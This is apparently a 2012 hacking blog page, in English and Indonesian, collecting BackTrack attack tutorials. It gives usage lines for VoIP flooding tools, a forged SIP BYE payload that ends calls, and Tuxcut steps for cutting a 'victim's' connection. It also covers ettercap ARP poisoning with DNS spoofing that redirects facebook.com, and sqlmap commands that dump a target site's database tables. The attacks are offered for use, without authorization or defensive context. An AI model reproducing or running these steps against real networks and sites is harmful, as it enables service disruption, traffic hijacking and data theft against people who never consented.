Minggu, 25 November 2012

Denial of Service (DoS)

Denial Of Service

A denial of service attack on VoIP services can render it useless by causing an intentionally damage to the network and VoIP systems availability. This attack can occur on two levels, standard network dos attacks and VoIP specific dos attacks. Generally we will send tons of data by flooding the network to consume all its resources or a specific protocol in order to overwhelm it with tons of requests. Let�s take a quick overview of the tools available in Backtrack 

Inviteflood

This tool can be used to flood a target with INVITE requests it can be used to target sip gateways/proxies and sip phones.
root@bt:/pentest/voip/inviteflood# ./inviteflood
inviteflood - Version 2.0
June 09, 2006
Usage:
Mandatory -
interface (e.g. eth0)
target user (e.g. "" or john.doe or 5000 or "1+210-555-1212")
target domain (e.g. enterprise.com or an IPv4 address)
IPv4 addr of flood target (ddd.ddd.ddd.ddd)
flood stage (i.e. number of packets)
Optional -
-a flood tool "From:" alias (e.g. jane.doe)
-i IPv4 source IP address [default is IP address of interface]
-S srcPort (0 - 65535) [default is well-known discard port 9]
-D destPort (0 - 65535) [default is well-known SIP port 5060]
-l lineString line used by SNOM [default is blank]
-s sleep time btwn INVITE msgs (usec)
-h help - print this usage
-v verbose output mode

A basic usage syntax looks like this: 

./inviteflood eth0 target_extension target_domain target_ip number_of_packets


Sip 35.png


As long the tool keeps flooding the sip gateway it will prevent users from making phone calls. You can flood the sip proxy with an inexistent extension thus making it generating a 404 not found just to keep it busy. 

Rtpflood

Rtp flood is used to flood a target IP phone with a UDP packet contains a RTP data In order to launch a successful attack using rtpflood you will need know the RTP listening port on the remote device you want to attack, for example; x-lite sofphone default rtp port is 8000.
root@bt:/pentest/voip/rtpflood# ./rtpflood
usage: ./rtpflood sourcename destinationname srcport destport numpackets seqno timestamp SSID


Sip 36.png

Iaxflood

IAXFlood is a tool for flooding the IAX2 protocol which is used by the Asterisk PBX.
root@bt:/pentest/voip/iaxflood# ./iaxflood
usage: ./iaxflood sourcename destinationname numpackets


Sip 37.png

Teardown

Teardown is used to terminate a call by sending a bye request
./teardown eth0 extension sip_proxy 10.1.101.35 CallID FromTag ToTag

First you will need to capture a valid sip OK response and use its from and to tags and a valid caller id value. 

SIP/2.0 200 OK
Via: SIP/2.0/UDP 192.168.1.105;branch=z9hG4bKkfnyfaol;received=192.168.1.105;rport=5060
From: "200" ;tag=hcykd
To: "200" ;tag=as644fe807
Call-ID: jwtgckolqnoylqf@backtrack
CSeq: 134 REGISTER
User-Agent: Asterisk PBX
Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY
Supported: replaces
Expires: 3600
Contact: ;expires=3600
Date: Tue, 01 Feb 2011 17:55:42 GMT
Content-Length: 0


Sip 38.png


If you specify the �-v� option you can see the payload:
SIP PAYLOAD for packet:
BYE sip:200@192.168.1.104:5060 SIP/2.0
Via: SIP/2.0/UDP 192.168.1.105:9;branch=91ca1ba5-98ee-44d5-9170-61c30981c565
From: <sip:192.168.1.104>;tag=hcykd
To: 200 <sip:200@192.168.1.104>;tag=as644fe807
Call-ID: jwtgckolqnoylqf@backtrack
CSeq: 2000000000 BYE
Max-Forwards: 16
User-Agent: Hacker
Content-Length: 0
Contact: <sip:192.168.1.105:9>


Video DNS Spoofing + Apache2 - Backtrack


Cara Memutus koneksi dengan Tuxcut - Backtrack



Tuxcut sama saja seperti netcut, yang digunakan untuk memotong/memutus koneksi client pada jaringan Wifi/wirelles dan LAN...

Tuxcut membutuhkan modul2 lain, seperti
-arp-scan
-dsniff
-arp-tables

jika belum mempunyai ketiga itu download dan instal saja ,,,

1. arp-scan ( buka terminal lalu ketik ) :

   apt-get install arp-scan

2. dsnif

    apt-get install dsniff

3. arp-tables

    apt-get install arptables

jika sudah Download Tuxcut disini https://bitbucket.org/a_atalla/tuxcut/downloads/
saat ini yang terbaru untuk backtrack/ubuntu yang " TuxCut-3.2_all.deb "

jika sudah d download instal dengan cara mengetikan perintah :

dpkg -i TuxCut-3.2_all.deb

di sesuaikan dengan direktorinya , jika filenya di simpan d dekstop jangan lp cd Desktop dl :D

Dan jika agan ingin menjalankannya cukup ketik perintah Tuxcut di terminal...


















- klik scan untuk scanning target...
- jika sudah muncul IP klik CUT untuk memutuskan koneksi korban
- Resume untuk menyambungkan lagi koneksi korban..
- Change MAC untuk menggantu MAC address kl tdk salah..
- Klik Protect Me untuk memproteksi koneksi anda...

* saya sudah mencoba pada jaringan Wireless ataupun LAN, dan Berhasil...

Selamat Mencoba....


DNS Spoofing With Ettercap - Backtrack




dulu saya pernah posting cara DNS spoofing di Windows menggunakan Cain and Abel...
sekarang saya mau share Dns spoofing di Backtrack dengan Ettercap...
kebetulan masih byk yang belum tau dengan statusbaru.com ( jejaring sosial buatan Indonesia ) makanya kita alihkan www.facebook.com ke www.statusbaru.com pada jaringan kabel ( LAN ) ataupun Wireles...
ok mulai...

- pertama buka etter.dns dengan perintah pada terminal :
gedit /usr/share/ettercap/etter.dns 
jika kosong cb disini gedit /usr/local/share/ettercap/etter.dns 
- Hapus semua tulisannya dan ganti dengan :
*.facebook.com A 63.141.225.196 ( 63.141.225.196 adalah ip statusbaru.com ) lalu save dan keluar
- jalankan dns_spoofing dgn perintah :
ettercap -Tqi eth0 anda -P dns_spoof -M arp // // lalu enter
ket :
eth0 adalah interface saya lihat sja dgn perintah ifconfig
dan pada // // bisa jg d isi dengan target pilihan anda..
contoh :
/target 1/ /target2/ 
dimana target 1 = default gateway dan target 2 = ip korban
ettercap -Tqi eth0 anda -P dns_spoof -M arp:remote /gateway/ /target/
tapi sy lebih senang dengan menggunakan " // // "saja :)
 - tunggu sampai target membuka www.facebook.com
jika berhasil maka di terminal akan ada jawaban : dns_spoof: [www.facebook.com] spoofed to [63.141.225.196] berarti kitasudah berhasil..

Selamat Mencoba... ^_^


Tutorial + Video Backtrack 5 Sql injection (sqlmap)

Kali ini saya akan share sql injection di Backtrack 5 dengan menggunakan sqlmap...
silahkan dilihat Videonya , untuk penjelasan baca di bawah..
maaf  jika kurang jelas ataupun ada yg salah...karena sayapun masih belajar...







- untuk membuka sqlmap buka terminal ( ctrl + t ) ketikan perintah cd /pentest/database/sqlmap
- untuk mencari nama database : ./sqlmap.py -u http://www.targetanda.com/index.php?id=100 --dbs
-u = url , --dbs = mencari database
- untuk mencari nama tables :  ./sqlmap.py -u http://www.targetanda.com/index.php?id=100 -D namadatabase --tables
 - untuk mencari column ./sqlmap.py -u http://www.targetanda.com/index.php?id=100 -D namadatabase -T namatable --columns
- terakhir untuk melihat / mengambil isi dari table ./sqlmap.py -u http://www.targetanda.com/index.php?id=100 -D namadatabase -T namatable --dump


Semoga bermanfaat :)